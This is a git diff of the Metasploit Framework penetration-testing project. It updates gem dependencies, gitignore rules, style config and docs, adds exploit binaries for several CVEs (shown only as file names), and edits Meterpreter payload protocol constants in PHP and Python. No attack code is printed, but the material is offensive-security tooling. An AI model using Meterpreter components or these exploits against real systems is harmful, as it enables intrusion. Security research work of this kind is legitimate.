diff --git a/.gitignore b/.gitignore
index 82e108ff0c..0661f00c84 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,6 @@
 .bundle
+Gemfile.local
+Gemfile.local.lock
 # Rubymine project directory
 .idea
 # Sublime Text project directory (not created by ST by default)
@@ -13,8 +15,6 @@
 config/database.yml
 # simplecov coverage data
 coverage
-data/meterpreter/ext_server_pivot.x86.dll
-data/meterpreter/ext_server_pivot.x64.dll
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
@@ -51,3 +51,22 @@ tags
 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug
 external/source/exploits/**/Release
+
+# Avoid checking in Meterpreter binaries. These are supplied upstream by
+# the meterpreter_bins gem.
+data/meterpreter/elevator.*.dll
+data/meterpreter/ext_server_espia.*.dll
+data/meterpreter/ext_server_extapi.*.dll
+data/meterpreter/ext_server_incognito.*.dll
+data/meterpreter/ext_server_kiwi.*.dll
+data/meterpreter/ext_server_lanattacks.*.dll
+data/meterpreter/ext_server_mimikatz.*.dll
+data/meterpreter/ext_server_priv.*.dll
+data/meterpreter/ext_server_stdapi.*.dll
+data/meterpreter/metsrv.*.dll
+data/meterpreter/screenshot.*.dll
+
+# Avoid checking in Meterpreter libs that are built from
+# private source. If you're interested in this functionality,
+# check out Metasploit Pro: http://metasploit.com/download
+data/meterpreter/ext_server_pivot.*.dll
diff --git a/.mailmap b/.mailmap
index 713206e261..79a858c2a7 100644
--- a/.mailmap
+++ b/.mailmap
@@ -18,6 +18,7 @@ todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@packetfu.com>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <Trevor_Rosen@rapid7.com>
+trosen-r7 <trosen-r7@github>       Trevor Rosen <trevor@catapult-creative.com>
 wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
diff --git a/.rubocop.yml b/.rubocop.yml
new file mode 100644
index 0000000000..a8a443fbd5
--- /dev/null
+++ b/.rubocop.yml
@@ -0,0 +1,19 @@
+LineLength:
+  Enabled: true
+  Max: 180
+
+MethodLength:
+  Enabled: true
+  Max: 100
+
+Style/ClassLength:
+  Exclude:
+    # Most modules are quite large and all contained in one class.  This is OK.
+    - 'modules/**/*'
+
+Style/NumericLiterals:
+  Enabled: false
+
+Documentation:
+  Exclude:
+    - 'modules/**/*'
diff --git a/.ruby-version b/.ruby-version
index 7a895c2142..75bfecd56a 100644
--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-1.9.3-p484
+1.9.3-p547
diff --git a/.yardopts b/.yardopts
index bb3a0e391f..eb3cff1cc2 100644
--- a/.yardopts
+++ b/.yardopts
@@ -5,3 +5,4 @@
 --files CONTRIBUTING.md,COPYING,HACKING,LICENSE
 lib/msf/**/*.rb
 lib/rex/**/*.rb
+plugins/**/*.rb
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index b0614159d5..6de7c3cf36 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -33,6 +33,7 @@ and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-f
 ## Code Contributions
 
 * **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
+* Similarly, **try** to get Rubocop passing or at least relatively quiet against the files added/modified as part of your contribution
 * **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
 * **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
 
@@ -50,7 +51,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
 #### New Modules
 
 * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
-* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
 
 #### Library Code
diff --git a/Gemfile b/Gemfile
index c6f821cd4c..a5a71b8d46 100755
--- a/Gemfile
+++ b/Gemfile
@@ -1,27 +1,31 @@
 source 'https://rubygems.org'
 
 # Need 3+ for ActiveSupport::Concern
-gem 'activesupport', '>= 3.0.0'
+gem 'activesupport', '>= 3.0.0', '< 4.0.0'
 # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
 gem 'bcrypt'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
+# Needed for Meterpreter on Windows, soon others.
+gem 'meterpreter_bins', '0.0.6'
 # Needed by msfgui and other rpc components
 gem 'msgpack'
 # Needed by anemone crawler
 gem 'nokogiri'
+# Needed by db.rb and Msf::Exploit::Capture
+gem 'packetfu', '1.1.9'
 # Needed by JSObfu
 gem 'rkelly-remix', '0.0.6'
 # Needed by anemone crawler
 gem 'robots'
-# Needed by db.rb and Msf::Exploit::Capture
-gem 'packetfu', '1.1.9'
+# Needed for some post modules
+gem 'sqlite3'
 
 group :db do
   # Needed for Msf::DbManager
-  gem 'activerecord'
+  gem 'activerecord', '>= 3.0.0', '< 4.0.0'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.17.0'
+  gem 'metasploit_data_models', '0.17.0'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
@@ -33,6 +37,8 @@ group :pcap do
 end
 
 group :development do
+  # Style/sanity checking Ruby code
+  gem 'rubocop'
   # Markdown formatting for yard
   gem 'redcarpet'
   # generating documentation
diff --git a/Gemfile.local.example b/Gemfile.local.example
new file mode 100644
index 0000000000..9788ec95dc
--- /dev/null
+++ b/Gemfile.local.example
@@ -0,0 +1,36 @@
+##
+# Example Gemfile.local file for Metasploit Framework
+#
+# The Gemfile.local file provides a way to use other gems that are not
+# included in the standard Gemfile provided with Metasploit.
+# This filename is included in Metasploit's .gitignore file, so local changes
+# to this file will not accidentally show up in future pull requests. This
+# example Gemfile.local includes all gems in Gemfile using instance_eval.
+# It also creates a new bundle group, 'local', to hold additional gems.
+#
+# This file will not be used by default within the framework. As such, one
+# must first install the custom Gemfile.local with bundle:
+#   bundle install --gemfile Gemfile.local
+#
+# Note that msfupdate does not consider Gemfile.local when updating the
+# framework. If it is used, it may be necessary to run the above bundle
+# command after the update.
+#
+###
+
+# Include the Gemfile included with the framework. This is very
+# important for picking up new gem dependencies.
+msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
+if File.readable?(msf_gemfile)
+  instance_eval(File.read(msf_gemfile))
+end
+
+# Create a custom group
+group :local do
+  # Use pry to help view and interact with objects in the framework
+  gem 'pry', '~> 0.9'
+  # Use pry-debugger to step through code during development
+  gem 'pry-debugger', '~> 0.2'
+  # Add the lab gem so that the 'lab' plugin will work again
+  gem 'lab', '~> 0.2.7'
+end
diff --git a/Gemfile.lock b/Gemfile.lock
index 379ea1cb81..0ae4dcf18e 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -13,6 +13,7 @@ GEM
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
+    ast (2.0.0)
     bcrypt (3.1.7)
     builder (3.0.4)
     database_cleaner (1.1.1)
@@ -26,6 +27,7 @@ GEM
       activerecord (>= 3.2.13)
       activesupport
       pg
+    meterpreter_bins (0.0.6)
     mini_portile (0.5.1)
     msgpack (0.5.5)
     multi_json (1.0.4)
@@ -33,8 +35,13 @@ GEM
     nokogiri (1.6.0)
       mini_portile (~> 0.5.0)
     packetfu (1.1.9)
+    parser (2.1.9)
+      ast (>= 1.1, < 3.0)
+      slop (~> 3.4, >= 3.4.5)
     pcaprub (0.11.3)
     pg (0.16.0)
+    powerpack (0.0.9)
+    rainbow (2.0.0)
     rake (10.1.0)
     redcarpet (3.0.0)
     rkelly-remix (0.0.6)
@@ -47,12 +54,21 @@ GEM
     rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
     rspec-mocks (2.14.3)
+    rubocop (0.23.0)
+      json (>= 1.7.7, < 2)
+      parser (~> 2.1.9)
+      powerpack (~> 0.0.6)
+      rainbow (>= 1.99.1, < 3.0)
+      ruby-progressbar (~> 1.4)
+    ruby-progressbar (1.5.1)
     shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
+    slop (3.5.0)
+    sqlite3 (1.3.9)
     timecop (0.6.3)
     tzinfo (0.3.37)
     yard (0.8.7)
@@ -61,14 +77,15 @@ PLATFORMS
   ruby
 
 DEPENDENCIES
-  activerecord
-  activesupport (>= 3.0.0)
+  activerecord (>= 3.0.0, < 4.0.0)
+  activesupport (>= 3.0.0, < 4.0.0)
   bcrypt
   database_cleaner
   factory_girl (>= 4.1.0)
   fivemat (= 1.2.1)
   json
-  metasploit_data_models (~> 0.17.0)
+  metasploit_data_models (= 0.17.0)
+  meterpreter_bins (= 0.0.6)
   msgpack
   network_interface (~> 0.0.1)
   nokogiri
@@ -80,7 +97,9 @@ DEPENDENCIES
   rkelly-remix (= 0.0.6)
   robots
   rspec (>= 2.12)
+  rubocop
   shoulda-matchers
   simplecov (= 0.5.4)
+  sqlite3
   timecop
   yard
diff --git a/HACKING b/HACKING
index 1de1e7cfa1..17343a9f03 100644
--- a/HACKING
+++ b/HACKING
@@ -10,7 +10,7 @@ CONTRIBUTING.md
 in the same directory as this file, and to a lesser extent:
 
 The Metasploit Development Environment
-https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
+https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
 
 Common Coding Mistakes
 https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
diff --git a/LICENSE b/LICENSE
index ea38924130..e16ad8f0a2 100644
--- a/LICENSE
+++ b/LICENSE
@@ -36,6 +36,10 @@ Files: external/ruby-lorcon/*
 Copyright: 2005, dragorn and Joshua Wright
 License: LGPL-2.1
 
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+
 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml
index 39fa1cea0e..57e86cd85b 100644
Binary files a/data/android/apk/AndroidManifest.xml and b/data/android/apk/AndroidManifest.xml differ
diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex
index 29eda9c903..ff39e87f11 100644
Binary files a/data/android/apk/classes.dex and b/data/android/apk/classes.dex differ
diff --git a/data/android/apk/res/drawable-mdpi/icon.png b/data/android/apk/res/drawable-mdpi/icon.png
deleted file mode 100644
index c2e4f5634b..0000000000
Binary files a/data/android/apk/res/drawable-mdpi/icon.png and /dev/null differ
diff --git a/data/android/apk/res/layout/main.xml b/data/android/apk/res/layout/main.xml
deleted file mode 100644
index 23d9bacad3..0000000000
Binary files a/data/android/apk/res/layout/main.xml and /dev/null differ
diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc
index 4fe928b45e..03f6c44d28 100644
Binary files a/data/android/apk/resources.arsc and b/data/android/apk/resources.arsc differ
diff --git a/data/android/libs/armeabi/libndkstager.so b/data/android/libs/armeabi/libndkstager.so
new file mode 100644
index 0000000000..d5b8051f7e
Binary files /dev/null and b/data/android/libs/armeabi/libndkstager.so differ
diff --git a/data/android/libs/mips/libndkstager.so b/data/android/libs/mips/libndkstager.so
new file mode 100644
index 0000000000..973ffe39a7
Binary files /dev/null and b/data/android/libs/mips/libndkstager.so differ
diff --git a/data/android/libs/x86/libndkstager.so b/data/android/libs/x86/libndkstager.so
new file mode 100644
index 0000000000..2ebc0a6bcc
Binary files /dev/null and b/data/android/libs/x86/libndkstager.so differ
diff --git a/data/android/meterpreter.jar b/data/android/meterpreter.jar
index 9fcffba058..35e3ddf6b5 100644
Binary files a/data/android/meterpreter.jar and b/data/android/meterpreter.jar differ
diff --git a/data/android/metstage.jar b/data/android/metstage.jar
index 9a3d4d6315..6803307a5f 100644
Binary files a/data/android/metstage.jar and b/data/android/metstage.jar differ
diff --git a/data/android/shell.jar b/data/android/shell.jar
index 83c879c582..5fd680fa8f 100644
Binary files a/data/android/shell.jar and b/data/android/shell.jar differ
diff --git a/data/exploits/CVE-2013-5045/CVE-2013-5045.dll b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll
new file mode 100755
index 0000000000..fd0b378216
Binary files /dev/null and b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll differ
diff --git a/data/exploits/CVE-2013-5331/Exploit.swf b/data/exploits/CVE-2013-5331/Exploit.swf
new file mode 100755
index 0000000000..5dbfe348fb
Binary files /dev/null and b/data/exploits/CVE-2013-5331/Exploit.swf differ
diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll
new file mode 100755
index 0000000000..880dab9127
Binary files /dev/null and b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll differ
diff --git a/data/exploits/CVE-2014-0497/Vickers.swf b/data/exploits/CVE-2014-0497/Vickers.swf
new file mode 100755
index 0000000000..f0e1ccb1f4
Binary files /dev/null and b/data/exploits/CVE-2014-0497/Vickers.swf differ
diff --git a/data/exploits/CVE-2014-0515/Graph.swf b/data/exploits/CVE-2014-0515/Graph.swf
new file mode 100755
index 0000000000..aa30c2421e
Binary files /dev/null and b/data/exploits/CVE-2014-0515/Graph.swf differ
diff --git a/data/exploits/cve-2013-1300/schlamperei.x86.dll b/data/exploits/cve-2013-1300/schlamperei.x86.dll
new file mode 100644
index 0000000000..9b43f9843d
Binary files /dev/null and b/data/exploits/cve-2013-1300/schlamperei.x86.dll differ
diff --git a/data/exploits/osx/nfs_mount_priv_escalation.bin b/data/exploits/osx/nfs_mount_priv_escalation.bin
new file mode 100644
index 0000000000..fe182e5693
Binary files /dev/null and b/data/exploits/osx/nfs_mount_priv_escalation.bin differ
diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index 05850b7398..408b3f92c8 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -20,6 +20,7 @@ arch_armle    = "armle";
 arch_x86      = "x86";
 arch_x86_64   = "x86_64";
 arch_ppc      = "ppc";
+arch_mipsle   = "mipsle";
 
 window.os_detect = {};
 
@@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
 			} else if (platform.match(/arm/)) {
 				// Android and maemo
 				arch = arch_armle;
-				if (navigator.userAgent.match(/android/i)) {
-					os_flavor = 'Android';
-				}
+			} else if (platform.match(/x86/)) {
+				arch = arch_x86;
+			} else if (platform.match(/mips/)) {
+				arch = arch_mipsle;
+			}
+
+
+			if (navigator.userAgent.match(/android/i)) {
+				os_flavor = 'Android';
 			}
 		} else if (platform.match(/windows/)) {
 			os_name = oses_windows;
diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib
old mode 100755
new mode 100644
index dc6eda3974..7513cc3ae8
Binary files a/data/meterpreter/common.lib and b/data/meterpreter/common.lib differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
deleted file mode 100755
index 5704ed065d..0000000000
Binary files a/data/meterpreter/elevator.x64.dll and /dev/null differ
diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll
deleted file mode 100755
index 5162e25b34..0000000000
Binary files a/data/meterpreter/elevator.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
deleted file mode 100755
index c3297a20ac..0000000000
Binary files a/data/meterpreter/ext_server_espia.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll
deleted file mode 100755
index 9f4938354a..0000000000
Binary files a/data/meterpreter/ext_server_espia.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll
deleted file mode 100755
index 485311ec94..0000000000
Binary files a/data/meterpreter/ext_server_extapi.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll
deleted file mode 100755
index 985a510475..0000000000
Binary files a/data/meterpreter/ext_server_extapi.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
deleted file mode 100755
index faed750330..0000000000
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll
deleted file mode 100755
index 98198341b3..0000000000
Binary files a/data/meterpreter/ext_server_incognito.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll
deleted file mode 100755
index 294ef2261a..0000000000
Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll
deleted file mode 100755
index ef92743241..0000000000
Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll
deleted file mode 100755
index 2d10147d47..0000000000
Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll
deleted file mode 100755
index 88df3a70e3..0000000000
Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_networkpug.lso b/data/meterpreter/ext_server_networkpug.lso
index fef0426930..95eee22e7f 100755
Binary files a/data/meterpreter/ext_server_networkpug.lso and b/data/meterpreter/ext_server_networkpug.lso differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
deleted file mode 100755
index f13693d08b..0000000000
Binary files a/data/meterpreter/ext_server_priv.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll
deleted file mode 100755
index 0e61427ac4..0000000000
Binary files a/data/meterpreter/ext_server_priv.x86.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_sniffer.lso b/data/meterpreter/ext_server_sniffer.lso
index a172634dd1..d7c4ee9956 100755
Binary files a/data/meterpreter/ext_server_sniffer.lso and b/data/meterpreter/ext_server_sniffer.lso differ
diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll
index 75b7a50a32..3a36b5bf81 100755
Binary files a/data/meterpreter/ext_server_sniffer.x64.dll and b/data/meterpreter/ext_server_sniffer.x64.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.x86.dll b/data/meterpreter/ext_server_sniffer.x86.dll
index 1b88ab0fcc..b3d708ef96 100755
Binary files a/data/meterpreter/ext_server_sniffer.x86.dll and b/data/meterpreter/ext_server_sniffer.x86.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar
index bef5cee014..b6a01cac09 100644
Binary files a/data/meterpreter/ext_server_stdapi.jar and b/data/meterpreter/ext_server_stdapi.jar differ
diff --git a/data/meterpreter/ext_server_stdapi.lso b/data/meterpreter/ext_server_stdapi.lso
index e9e73d42db..383bb0579c 100755
Binary files a/data/meterpreter/ext_server_stdapi.lso and b/data/meterpreter/ext_server_stdapi.lso differ
diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php
index 20cbc03793..e2565f86d0 100755
--- a/data/meterpreter/ext_server_stdapi.php
+++ b/data/meterpreter/ext_server_stdapi.php
@@ -6,10 +6,10 @@
 ##
 # General
 ##
-define("TLV_TYPE_HANDLE",              TLV_META_TYPE_UINT    |  600);
+define("TLV_TYPE_HANDLE",              TLV_META_TYPE_QWORD   |  600);
 define("TLV_TYPE_INHERIT",             TLV_META_TYPE_BOOL    |  601);
-define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_UINT    |  630);
-define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_UINT    |  631);
+define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_QWORD   |  630);
+define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_QWORD   |  631);
 
 ##
 # Fs
@@ -65,7 +65,7 @@ define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
 define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
 
 # Registry
-define("TLV_TYPE_HKEY",                TLV_META_TYPE_UINT    | 1000);
+define("TLV_TYPE_HKEY",                TLV_META_TYPE_QWORD   | 1000);
 define("TLV_TYPE_ROOT_KEY",            TLV_TYPE_HKEY);
 define("TLV_TYPE_BASE_KEY",            TLV_META_TYPE_STRING  | 1001);
 define("TLV_TYPE_PERMISSION",          TLV_META_TYPE_UINT    | 1002);
@@ -90,12 +90,12 @@ define("TLV_TYPE_ENV_GROUP",           TLV_META_TYPE_GROUP   | 1102);
 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
 
 # Process
-define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_UINT    | 2000);
+define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_QWORD   | 2000);
 define("TLV_TYPE_ALLOCATION_TYPE",     TLV_META_TYPE_UINT    | 2001);
 define("TLV_TYPE_PROTECTION",          TLV_META_TYPE_UINT    | 2002);
 define("TLV_TYPE_PROCESS_PERMS",       TLV_META_TYPE_UINT    | 2003);
 define("TLV_TYPE_PROCESS_MEMORY",      TLV_META_TYPE_RAW     | 2004);
-define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_UINT    | 2005);
+define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_QWORD   | 2005);
 define("TLV_TYPE_MEMORY_STATE",        TLV_META_TYPE_UINT    | 2006);
 define("TLV_TYPE_MEMORY_TYPE",         TLV_META_TYPE_UINT    | 2007);
 define("TLV_TYPE_ALLOC_PROTECTION",    TLV_META_TYPE_UINT    | 2008);
@@ -109,16 +109,16 @@ define("TLV_TYPE_PROCESS_ARGUMENTS",   TLV_META_TYPE_STRING  | 2305);
 define("TLV_TYPE_IMAGE_FILE",          TLV_META_TYPE_STRING  | 2400);
 define("TLV_TYPE_IMAGE_FILE_PATH",     TLV_META_TYPE_STRING  | 2401);
 define("TLV_TYPE_PROCEDURE_NAME",      TLV_META_TYPE_STRING  | 2402);
-define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_UINT    | 2403);
-define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_UINT    | 2404);
+define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_QWORD   | 2403);
+define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_QWORD   | 2404);
 define("TLV_TYPE_IMAGE_GROUP",         TLV_META_TYPE_GROUP   | 2405);
 define("TLV_TYPE_IMAGE_NAME",          TLV_META_TYPE_STRING  | 2406);
 
 define("TLV_TYPE_THREAD_ID",           TLV_META_TYPE_UINT    | 2500);
 define("TLV_TYPE_THREAD_PERMS",        TLV_META_TYPE_UINT    | 2502);
 define("TLV_TYPE_EXIT_CODE",           TLV_META_TYPE_UINT    | 2510);
-define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_UINT    | 2511);
-define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_UINT    | 2512);
+define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_QWORD   | 2511);
+define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_QWORD   | 2512);
 define("TLV_TYPE_CREATION_FLAGS",      TLV_META_TYPE_UINT    | 2513);
 
 define("TLV_TYPE_REGISTER_NAME",       TLV_META_TYPE_STRING  | 2540);
@@ -137,7 +137,7 @@ define("TLV_TYPE_DESKTOP",             TLV_META_TYPE_STRING  | 3002);
 # Event Log
 ##
 define("TLV_TYPE_EVENT_SOURCENAME",    TLV_META_TYPE_STRING  | 4000);
-define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_UINT    | 4001);
+define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_QWORD   | 4001);
 define("TLV_TYPE_EVENT_NUMRECORDS",    TLV_META_TYPE_UINT    | 4002);
 
 define("TLV_TYPE_EVENT_READFLAGS",     TLV_META_TYPE_UINT    | 4003);
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index ae9cab6cb8..660072ad2b 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -48,6 +48,24 @@ try:
 except ImportError:
 	has_winreg = False
 
+try:
+	import winreg
+	has_winreg = True
+except ImportError:
+	has_winreg = (has_winreg or False)
+
+if sys.version_info[0] < 3:
+	is_str = lambda obj: issubclass(obj.__class__, str)
+	is_bytes = lambda obj: issubclass(obj.__class__, str)
+	bytes = lambda *args: str(*args[:1])
+	NULL_BYTE = '\x00'
+else:
+	is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+	str = lambda x: __builtins__['str'](x, 'UTF-8')
+	NULL_BYTE = bytes('\x00', 'UTF-8')
+	long = int
+
 if has_ctypes:
 	#
 	# Windows Structures
@@ -234,6 +252,7 @@ TLV_META_TYPE_STRING     = (1 << 16)
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -266,10 +285,10 @@ TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54
 ##
 # General
 ##
-TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_HANDLE                = TLV_META_TYPE_QWORD   | 600
 TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
-TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
-TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_QWORD   | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_QWORD   | 631
 
 ##
 # Fs
@@ -328,7 +347,7 @@ TLV_TYPE_SHUTDOWN_HOW          = TLV_META_TYPE_UINT    | 1530
 ##
 # Registry
 ##
-TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_HKEY                  = TLV_META_TYPE_QWORD   | 1000
 TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
 TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
 TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
@@ -358,12 +377,12 @@ DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
 ##
 # Process
 ##
-TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_QWORD   | 2000
 TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
 TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
 TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
 TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_QWORD   | 2005
 TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
 TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
 TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
@@ -379,16 +398,16 @@ TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT    | 2307
 TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
 TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
 TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_QWORD   | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_QWORD   | 2404
